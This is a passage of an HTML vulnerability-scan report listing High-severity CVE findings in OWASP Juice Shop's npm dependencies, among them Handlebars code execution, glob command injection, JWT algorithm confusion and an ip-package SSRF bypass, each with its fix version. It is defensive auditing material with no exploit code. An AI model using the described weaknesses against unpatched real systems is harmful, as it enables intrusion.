+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28390
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 69: NSWG-ECO-428 Base64url 0.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
base64url0.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/base64url/package.json
+
+
+
+ + + + + +
Description
+

Out-of-bounds Read
+Target: Node.js
+Type: node-pkg
+Fixed version: >=3.0.0

+

base64url allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below

+ + +
Mitigation
+
+

=3.0.0

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/brianloveswords/base64url/pull/25
+https://hackerone.com/reports/321687

+ + + + + + + +
+
+
+
+ Finding 83: CVE-2024-4068 Braces 2.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1050 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
braces2.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/braces/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

braces: fails to limit the number of characters it can handle
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.3

+

The NPM package braces, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, + if a malicious user sends "imbalanced braces" as input, the parsing +will enter a loop, which will cause the program to start allocating heap + memory without freeing it at any moment of the loop. Eventually, the +JavaScript heap limit is reached, and the program will crash.

+ + +
Mitigation
+

3.0.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-4068
+https://devhub.checkmarx.com/cve-details/CVE-2024-4068
+https://devhub.checkmarx.com/cve-details/CVE-2024-4068/
+https://github.com/micromatch/braces
+https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308
+https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff
+https://github.com/micromatch/braces/issues/35
+https://github.com/micromatch/braces/pull/37
+https://github.com/micromatch/braces/pull/40
+https://nvd.nist.gov/vuln/detail/CVE-2024-4068
+https://www.cve.org/CVERecord?id=CVE-2024-4068

+ + + + + + + +
+
+
+
+ Finding 89: CVE-2020-15084 Express-JWT 0.1.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 285 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
express-jwt0.1.3
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

+ + +
Description
+

Authorization bypass in express-jwt
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.0.0

+

In express-jwt (NPM package) up and including version 5.3.3, the +algorithms entry to be specified in the configuration is not being +enforced. When algorithms is not specified in the configuration, with +the combination of jwks-rsa, it may lead to authorization bypass. You +are affected by this vulnerability if all of the following conditions +apply: - You are using express-jwt - You do not have algorithms configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the secret. You can fix this by specifying algorithms in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0.

+ + +
Mitigation
+

6.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef
+https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf
+https://nvd.nist.gov/vuln/detail/CVE-2020-15084

+ + + + + + + +
+
+
+
+ Finding 91: CVE-2025-64756 Glob 10.4.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
glob10.4.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glob: glob: Command Injection Vulnerability via Malicious Filenames
+Target: Node.js
+Type: node-pkg
+Fixed version: 11.1.0, 10.5.0

+

Glob matches files using patterns the shell uses. Starting in version + 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a + command injection vulnerability in its -c/--cmd option that allows +arbitrary command execution when processing files with malicious names. +When glob -c <command> <patterns> are used, matched +filenames are passed to a shell with shell: true, enabling shell +metacharacters in filenames to trigger command injection and achieve +arbitrary code execution under the user or CI account privileges. This +issue has been patched in versions 10.5.0 and 11.1.0.

+ + +
Mitigation
+

11.1.0, 10.5.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-64756
+https://github.com/isaacs/node-glob
+https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f
+https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146
+https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2
+https://nvd.nist.gov/vuln/detail/CVE-2025-64756
+https://www.cve.org/CVERecord?id=CVE-2025-64756

+ + + + + + + +
+
+
+
+ Finding 94: CVE-2026-33938 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars: Handlebars: Arbitrary code execution via @partial-block overwrite
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the @partial-block + special variable is stored in the template data context and is +reachable and mutable from within a template via helpers that accept +arbitrary objects. When a helper overwrites @partial-block with a crafted Handlebars AST, a subsequent invocation of {{> @partial-block}} + compiles and executes that AST, enabling arbitrary JavaScript execution + on the server. Version 4.7.9 fixes the issue. Some workarounds are +available. First, use the runtime-only build (require('handlebars/runtime')). The compile() + method is absent, eliminating the vulnerable fallback path. Second, +audit registered helpers for any that write arbitrary values to context +objects. Helpers should treat context data as read-only. Third, avoid +registering helpers from third-party packages (such as handlebars-helpers) in contexts where templates or context data can be influenced by untrusted input.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33938
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r
+https://nvd.nist.gov/vuln/detail/CVE-2026-33938
+https://www.cve.org/CVERecord?id=CVE-2026-33938

+ + + + + + + +
+
+
+
+ Finding 95: CVE-2026-33939 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

handlebars.js: Handlebars.js: Denial of Service via malformed decorator syntax in template compilation
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, when a Handlebars template +contains decorator syntax referencing an unregistered decorator (e.g. {{*n}}), the compiled template calls lookupProperty(decorators, "n"), which returns undefined. The runtime then immediately invokes the result as a function, causing an unhandled TypeError: ... is not a function that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a try/catch + is vulnerable to a single-request Denial of Service. Version 4.7.9 +fixes the issue. Some workarounds are available. Wrap compilation and +rendering in try/catch. Validate template input before passing it to compile(); reject templates containing decorator syntax ({{*...}}) + if decorators are not used in your application. Use the pre-compilation + workflow; compile templates at build time and serve only pre-compiled +templates; do not call compile() at request time.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33939
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff
+https://nvd.nist.gov/vuln/detail/CVE-2026-33939
+https://www.cve.org/CVERecord?id=CVE-2026-33939

+ + + + + + + +
+
+
+
+ Finding 96: CVE-2026-33940 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars.js: Arbitrary code execution via crafted template context
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, a crafted object placed in +the template context can bypass all conditional guards in resolvePartial() and cause invokePartial() to return undefined. + The Handlebars runtime then treats the unresolved partial as a source +that needs to be compiled, passing the crafted object to env.compile(). + Because the object is a valid Handlebars AST containing injected code, +the generated JavaScript executes arbitrary commands on the server. The +attack requires the adversary to control a value that can be returned by + a dynamic partial lookup. Version 4.7.9 fixes the issue. Some +workarounds are available. First, use the runtime-only build (require('handlebars/runtime')). Without compile(), the fallback compilation path in invokePartial + is unreachable. Second, sanitize context data before rendering: Ensure +no value in the context is a non-primitive object that could be passed +to a dynamic partial. Third, avoid dynamic partial lookups ({{> (lookup ...)}}) when context data is user-controlled.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33940
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6
+https://nvd.nist.gov/vuln/detail/CVE-2026-33940
+https://www.cve.org/CVERecord?id=CVE-2026-33940

+ + + + + + + +
+
+
+
+ Finding 97: CVE-2026-33941 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars: Arbitrary code execution via CLI precompiler input sanitization flaw
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI +precompiler (bin/handlebars / lib/precompiler.js) + concatenates user-controlled strings — template file names and several +CLI options — directly into the JavaScript it emits, without any +escaping or sanitization. An attacker who can influence template +filenames or CLI arguments can inject arbitrary JavaScript that executes + when the generated bundle is loaded in Node.js or a browser. Version +4.7.9 fixes the issue. Some workarounds are available. First, validate +all CLI inputs before invoking the precompiler. Reject filenames and +option values that contain characters with JavaScript string-escaping +significance (", ', ;, etc.). +Second, use a fixed, trusted namespace string passed via a configuration + file rather than command-line arguments in automated pipelines. Third, + run the precompiler in a sandboxed environment (container with no write + access to sensitive paths) to limit the impact of successful +exploitation. Fourth, audit template filenames in any repository or +package that is consumed by an automated build pipeline.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33941
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf
+https://nvd.nist.gov/vuln/detail/CVE-2026-33941
+https://www.cve.org/CVERecord?id=CVE-2026-33941

+ + + + + + + +
+
+
+
+ Finding 101: CVE-2022-25881 HTTP-Cache-Semantics 3.8.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
http-cache-semantics3.8.1
+ + + + + + + +
File Path
juice-shop/node_modules/http-cache-semantics/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.1.1

+

This affects versions of the package http-cache-semantics before +4.1.1. The issue can be exploited via malicious request header values +sent to a server, when that server reads the cache policy from the +request using this library.

+ + +
Mitigation
+

4.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2023:2655
+https://access.redhat.com/security/cve/CVE-2022-25881
+https://bugzilla.redhat.com/2165824
+https://bugzilla.redhat.com/2168631
+https://bugzilla.redhat.com/2171935
+https://bugzilla.redhat.com/2172190
+https://bugzilla.redhat.com/2172204
+https://bugzilla.redhat.com/2172217
+https://bugzilla.redhat.com/show_bug.cgi?id=2165824
+https://bugzilla.redhat.com/show_bug.cgi?id=2168631
+https://bugzilla.redhat.com/show_bug.cgi?id=2171935
+https://bugzilla.redhat.com/show_bug.cgi?id=2172190
+https://bugzilla.redhat.com/show_bug.cgi?id=2172204
+https://bugzilla.redhat.com/show_bug.cgi?id=2172217
+https://bugzilla.redhat.com/show_bug.cgi?id=2178076
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25881
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23918
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23920
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23936
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24807
+https://errata.almalinux.org/9/ALSA-2023-2655.html
+https://errata.rockylinux.org/RLSA-2023:2655
+https://github.com/kornelski/http-cache-semantics
+https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83
+https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74
+https://linux.oracle.com/cve/CVE-2022-25881.html
+https://linux.oracle.com/errata/ELSA-2023-2655.html
+https://nvd.nist.gov/vuln/detail/CVE-2022-25881
+https://security.netapp.com/advisory/ntap-20230622-0008
+https://security.netapp.com/advisory/ntap-20230622-0008/
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332
+https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783
+https://www.cve.org/CVERecord?id=CVE-2022-25881

+ + + + + + + +
+
+
+
+ Finding 102: CVE-2024-29415 Ip 2.0.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 918 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ip2.0.1
+ + + + + + + +
File Path
juice-shop/node_modules/ip/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

node-ip: Incomplete fix for CVE-2023-42282
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

The ip package through 2.0.1 for Node.js might allow SSRF because +some IP addresses (such as 127.1, 01200034567, 012.1.2.3, +000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as +globally routable via isPublic. NOTE: this issue exists because of an +incomplete fix for CVE-2023-42282.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-29415
+https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html
+https://github.com/indutny/node-ip
+https://github.com/indutny/node-ip/issues/150
+https://github.com/indutny/node-ip/pull/143
+https://github.com/indutny/node-ip/pull/144
+https://nvd.nist.gov/vuln/detail/CVE-2024-29415
+https://security.netapp.com/advisory/ntap-20250117-0010
+https://security.netapp.com/advisory/ntap-20250117-0010/
+https://www.cve.org/CVERecord?id=CVE-2024-29415

+ + + + + + + +
+
+
+
+ Finding 106: CVE-2022-23539 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 327 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

jsonwebtoken: Unrestricted key type could lead to legacy keys usagen
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

Versions <=8.5.1 of jsonwebtoken library + could be misconfigured so that legacy, insecure key types are used for +signature verification. For example, DSA keys could be used with the +RS256 algorithm. You are affected if you are using an algorithm and a +key type other than a combination listed in the GitHub Security Advisory + as unaffected. This issue has been fixed, please update to version +9.0.0. This version validates for asymmetric key type and algorithm +combinations. Please refer to the above mentioned algorithm / key type +combinations for the valid secure configuration. After updating to +version 9.0.0, if you still intend to continue with signing or verifying + tokens using invalid key type/algorithm value combinations, you’ll need + to set the allowInvalidAsymmetricKeyTypes option to true in the sign() and/or verify() functions.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23539
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33
+https://nvd.nist.gov/vuln/detail/CVE-2022-23539
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23539

+ + + + + + + +
+
+
+
+ Finding 107: NSWG-ECO-17 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + + +
Description
+

Verification Bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.2.2

+

It is possible for an attacker to bypass verification when "a token +digitally signed with an asymetric key (RS/ES family) of algorithms but +instead the attacker send a token digitally signed with a symmetric +algorithm (HS* family)" [1]

+ + +
Mitigation
+
+

=4.2.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 111: CVE-2022-23539 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 327 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

jsonwebtoken: Unrestricted key type could lead to legacy keys usagen
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

Versions <=8.5.1 of jsonwebtoken library + could be misconfigured so that legacy, insecure key types are used for +signature verification. For example, DSA keys could be used with the +RS256 algorithm. You are affected if you are using an algorithm and a +key type other than a combination listed in the GitHub Security Advisory + as unaffected. This issue has been fixed, please update to version +9.0.0. This version validates for asymmetric key type and algorithm +combinations. Please refer to the above mentioned algorithm / key type +combinations for the valid secure configuration. After updating to +version 9.0.0, if you still intend to continue with signing or verifying + tokens using invalid key type/algorithm value combinations, you’ll need + to set the allowInvalidAsymmetricKeyTypes option to true in the sign() and/or verify() functions.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23539
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33
+https://nvd.nist.gov/vuln/detail/CVE-2022-23539
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23539

+ + + + + + + +
+
+
+
+ Finding 112: NSWG-ECO-17 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + + +
Description
+

Verification Bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.2.2

+

It is possible for an attacker to bypass verification when "a token +digitally signed with an asymetric key (RS/ES family) of algorithms but +instead the attacker send a token digitally signed with a symmetric +algorithm (HS* family)" [1]

+ + +
Mitigation
+
+

=4.2.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 115: CVE-2016-1000223 JWS 0.2.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jws0.2.6
+ + + + + + + +
File Path
juice-shop/node_modules/jws/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

+ + +
Description
+

Forgeable Public/Private Tokens
+Target: Node.js
+Type: node-pkg
+Fixed version: >=3.0.0

+

Since "algorithm" isn't enforced in jws.verify(), a +malicious user could choose what algorithm is sent to the server. If the + server is expecting RSA but is sent HMAC-SHA with RSA's public key, the + server will think the public key is actually an HMAC private key. This +could be used to forge any data an attacker wants.

+

In addition, there is the none algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the alg field is set to none.

+

Edit ( 7/29/16 ): A previous version of this advisory incorrectly + stated that the vulnerability was patched in version 2.0.0 instead of +3.0.0. The advisory has been updated to reflect this new information. +Thanks to Fabien Catteau for reporting the error.

+ + +
Mitigation
+
+

=3.0.0

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/brianloveswords/node-jws
+https://github.com/brianloveswords/node-jws/ +commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e
+https://nvd.nist.gov/vuln/detail/CVE-2016-1000223
+https://snyk.io/vuln/npm:jws:20160726
+https://www.npmjs.com/advisories/88

+ + + + + + + +
+
+
+
+ Finding 116: CVE-2025-65945 JWS 0.2.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 347 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jws0.2.6
+ + + + + + + +
File Path
juice-shop/node_modules/jws/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

node-jws: auth0/node-jws: Improper signature verification in HS256 algorithm
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.2.3, 4.0.1

+

